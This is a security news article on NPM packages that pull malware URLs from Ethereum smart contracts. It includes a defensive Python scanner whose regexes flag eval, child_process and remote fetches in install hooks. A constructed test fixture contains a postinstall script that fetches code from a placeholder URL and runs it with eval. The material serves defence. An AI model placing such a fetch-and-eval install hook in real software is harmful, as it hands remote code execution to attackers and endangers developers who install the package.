Cybersecurity experts have identified a method by which attackers deliver malware through malicious NPM packages that use blockchain queries to hide the location of their next-stage payload inside seemingly legitimate traffic. The discovery, made by ReversingLabs, concerns two NPM packages, 'colortoolsv2' and 'mimelib2', which were uploaded to the widely used Node Package Manager repository in July.
These packages use Ethereum smart contracts to retrieve URLs that point to downloader malware. Because the command-and-control address is obtained through an ordinary blockchain query rather than hard-coded in the package, the attackers circumvent traditional security scans, and the retrieval looks like a benign transaction.
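The distinguishing feature of this technique is the combination, inside an install-time script, of a blockchain lookup with code that downloads and executes whatever the lookup returns. The following scanner, written for this page as an added example and not part of ReversingLabs' tooling, applies that heuristic to an npm package directory: it reads the lifecycle hooks in `package.json`, inspects the JavaScript files they invoke, and flags the package only when both halves of the pattern appear. The indicator regexes, the `sample-benign` and `sample-suspicious` fixtures, and the `PLACEHOLDER_FROM_CONTRACT` value are all constructed assumptions for the example.

```python
import json
import re
import tempfile
from pathlib import Path

# Lifecycle hooks that npm runs automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicator patterns are assumptions for this example, not from the article.
BLOCKCHAIN_PATTERNS = {
    "eth_rpc_method": re.compile(r"\beth_(call|getLogs|getStorageAt)\b"),
    "eth_library": re.compile(r"require\(\s*['\"](ethers|web3)['\"]\s*\)"),
}
EXECUTION_PATTERNS = {
    "dynamic_eval": re.compile(r"\b(eval|new Function)\s*\("),
    "child_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "remote_fetch": re.compile(r"\b(fetch|https\.get|axios\.get)\s*\("),
}


def hook_script_files(pkg_dir: Path) -> list[Path]:
    """Return the JS files named on the command line of each lifecycle hook."""
    manifest = json.loads((pkg_dir / "package.json").read_text())
    found = []
    for hook in LIFECYCLE_HOOKS:
        command = manifest.get("scripts", {}).get(hook, "")
        for token in command.split():
            candidate = pkg_dir / token
            if token.endswith(".js") and candidate.is_file():
                found.append(candidate)
    return found


def scan_package(pkg_dir: str) -> dict:
    """Flag a package whose install-time scripts both query a blockchain and
    fetch or execute code; the combination, not either half alone, is the
    pattern the article describes."""
    blockchain, execution, files = set(), set(), []
    for script in hook_script_files(Path(pkg_dir)):
        source = script.read_text()
        files.append(script.name)
        blockchain |= {n for n, p in BLOCKCHAIN_PATTERNS.items() if p.search(source)}
        execution |= {n for n, p in EXECUTION_PATTERNS.items() if p.search(source)}
    return {
        "hook_scripts": files,
        "blockchain_indicators": sorted(blockchain),
        "execution_indicators": sorted(execution),
        "suspicious": bool(blockchain) and bool(execution),
    }


def build_sample_packages() -> tuple[str, str]:
    """Write two constructed packages to a temp dir: one benign, one that
    mimics the article's pattern. Returns (benign_dir, suspicious_dir)."""
    root = Path(tempfile.mkdtemp(prefix="npm-scan-"))

    benign = root / "sample-benign"
    benign.mkdir()
    (benign / "package.json").write_text(json.dumps({
        "name": "sample-benign", "version": "1.0.0",
        "scripts": {"postinstall": "node build.js"}}))
    (benign / "build.js").write_text(
        "const fs = require('fs');\nfs.writeFileSync('out.txt', 'built');\n")

    suspicious = root / "sample-suspicious"
    suspicious.mkdir()
    (suspicious / "package.json").write_text(json.dumps({
        "name": "sample-suspicious", "version": "2.0.1",
        "scripts": {"postinstall": "node setup.js"}}))
    # Constructed fixture: only the indicator strings matter; it is never run.
    (suspicious / "setup.js").write_text(
        "const { ethers } = require('ethers');\n"
        "// an eth_call against a contract would supply the URL here\n"
        "const url = 'PLACEHOLDER_FROM_CONTRACT';\n"
        "fetch(url).then(r => r.text()).then(code => eval(code));\n")
    return str(benign), str(suspicious)


if __name__ == "__main__":
    for pkg in build_sample_packages():
        print(pkg, json.dumps(scan_package(pkg), indent=2))
```

The benign fixture has a postinstall hook too, which is why the scanner keys on the co-occurrence of a blockchain indicator and an execution indicator rather than on the mere presence of a hook; in practice this belongs in a CI step that runs against the unpacked tarball before the package is ever installed with scripts enabled.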
This development is part of a larger deception campaign. The attackers have created fake GitHub repositories that masquerade as cryptocurrency trading bots, complete with counterfeit commits, fabricated user accounts, and professional-looking documentation. This strategy is designed to lure unsuspecting developers into using their compromised software.
The trend is a concerning one: experts have noted that similar campaigns have extended to Solana- and Bitcoin-related libraries, indicating a broader evolution in software-supply-chain threats. These findings raise important questions about the security of software development ecosystems and underline the need for vigilant practices among developers.